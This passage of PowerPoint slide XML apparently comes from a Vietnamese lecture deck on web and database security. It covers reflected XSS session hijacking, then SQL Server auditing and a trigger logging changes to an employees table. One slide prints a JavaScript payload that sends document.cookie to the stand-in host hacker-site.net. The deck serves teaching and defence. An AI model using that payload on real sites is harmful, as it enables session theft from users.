              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11EAA026-F022-65C3-5996-DB0E9576C341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="929076" y="4169696"/>
            <a:ext cx="9106679" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Người dùng đăng nhập web và giả sử được gán session:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcdee4e59d4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>acker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>gửi cho người dùng URL:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> là website nạn nhân truy cập, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>hacker-site.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> là trang của hacker tạo ra</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Đoạn javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>như sau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>var i=new Image; i.src=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://hacker-site.net/”+document.cookie;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2B6DAD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>với tham số là cookie người dùng:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Từ phía site của mình, hacker sẽ bắt được nội dung request trên và coi như session của người dùng sẽ bị chiếm. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F25E4AAD-25C8-3CBA-B32F-B019ACB395DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12014202" y="9594925"/>
            <a:ext cx="38100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Reflected XSS</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7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC379DCD-393D-0DDD-F8C5-8789917864C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8100671" y="9792038"/>
            <a:ext cx="7562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14</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3405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5B1938C7-B2E7-549E-E912-38644658EDCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="611350" y="2734353"/>
            <a:ext cx="17602199" cy="7322035"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main"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2C952F-5830-C262-DE02-E1A1A203006A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3568937"/>
            <a:ext cx="8686799" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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ính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mật của cơ sở dữ liệu không thể dựa vào bảo mật của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hệ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 phần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mềm khác</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mà</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ơ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sở dữ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 </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 khả năng</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tự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vệ </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 nó</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en-US"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t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"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ể </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-V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chèn, sửa đổi hoặc xóa dữ liệu là thông qua các quy trình được </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="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thủ tục được lưu trữ có logic tích hợp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 </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theo dõi.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1"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C769EE5-76AF-F159-C45A-27C5CE80E0E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12656019" y="9513835"/>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5021DF-39F0-0758-F81A-8E026D0A79EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10408746" y="2915207"/>
            <a:ext cx="7325214" cy="6598627"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE67DDB3-7A5A-767D-1E51-4D6D31AF507C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7948981" y="9562104"/>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15</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42476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67E9-19B2-8B22-635C-5BA313E365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3D57A9-1A61-2D00-7352-930408384EE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86113FE-99DB-6BE8-1B24-11404BAE9AE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4D23533B-5DCD-0E32-6EB5-B4D0B56F14AD}"/>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7C52AB2B-D578-3FAD-5593-67DF3818D1B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FADECB44-9566-4D63-2D2F-3C63679431D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CD02453-5E15-C5F7-0152-B59B1143F29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2A624EE-FBA4-1720-F8DE-88C0BA0DF7D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3381486"/>
            <a:ext cx="15316200"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Server Audit để giám sát các hoạt động Update và Insert trên bảng employees bởi người dùng</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>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6E6B241-D038-D2A9-AE3F-AF2C97F747B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="848912" y="3941826"/>
            <a:ext cx="8609133" cy="5087874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9178DA98-2EA8-BF90-C3E5-452EA2BEFF4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9353549" y="4102902"/>
            <a:ext cx="8146274" cy="5100875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C56AE39A-4822-0C38-A72F-03A2492B5E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8202111" y="9906560"/>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16</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5B2B235-A6F6-A2FF-5F18-58B7D85631D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8105494" y="8986474"/>
            <a:ext cx="274319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Audit</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F5E8BB7-159C-5DD5-AEF3-BA2716ACE15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250175" y="2741532"/>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9934895-F14D-3BC9-81EC-9EF88F6A38E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231125" y="3232466"/>
            <a:ext cx="12811546"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Tạo bảng để ghi lại các log trong bảng employees</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>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C928BF6-51EE-789A-8FCA-31B2642FABD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="9100439"/>
            <a:ext cx="27432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bảng ghi log</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52E683D-102A-5367-CB4D-7114CA2735B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3963268" y="3925407"/>
            <a:ext cx="10056663" cy="5058563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CF54C15-A0C8-81F6-0201-98B25C5A2495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8157624" y="9608639"/>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17</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159557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F5E8BB7-159C-5DD5-AEF3-BA2716ACE15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250175" y="2741532"/>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9934895-F14D-3BC9-81EC-9EF88F6A38E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231125" y="3232466"/>
            <a:ext cx="12811546"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Tạo Trigger để kiểm tra người dùng nào thay đổi giá trị trong bảng employees</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>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BC471D1-E07B-CF3C-7676-C2934BF007D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="750309" y="3726416"/>
            <a:ext cx="8088892" cy="6273590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7DBBFA6-E5A4-5504-7293-721CA5673510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9278260" y="3901076"/>
            <a:ext cx="8677780" cy="5859507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C928BF6-51EE-789A-8FCA-31B2642FABD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694141" y="9502012"/>
            <a:ext cx="24384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Trigger</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9" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F8119A-60B9-2CC8-B654-26DFE7DD2FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7959767" y="9982324"/>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18</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79335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F1964-67E4-9AF7-B783-874F8707DE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69AF8B-CD7E-36C9-E4CF-0715B10A4D3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4B87313-B1E2-AF4E-BF99-23873C32B8E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="321436"/>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C83951-A210-E509-6AB0-D45BE9460A86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2112946"/>
            <a:ext cx="17602199" cy="7907354"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C44C37D9-74AC-C308-F383-8C6E01474C0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E007B66-0D4F-9DC0-0E49-2D7D95B0410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6E17380F-05BC-B32F-44EA-21CECEC03382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915868" y="2208826"/>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0FF41A-F6DC-3D76-185F-2D433155FBD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="984951" y="5083706"/>
            <a:ext cx="15710227"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5D36C0F9-6080-5AB8-14E9-EFC1A4905D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915868" y="2718515"/>
            <a:ext cx="16146324"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a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Test lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(được thực thi lệnh update và insert trên bảng Employees) đã cài đặt từ trước </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>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4C17196-A237-95D5-A4B6-C1795C904747}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1515836" y="3154726"/>
            <a:ext cx="3583876" cy="1738711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47A3E2C5-DADA-ABEC-682B-B7812FB1BEE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8484650" y="3218896"/>
            <a:ext cx="7518649" cy="1344395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB0FE141-D6AD-DA68-92A6-A715929FAD00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281691" y="5915813"/>
            <a:ext cx="16346348" cy="2681970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
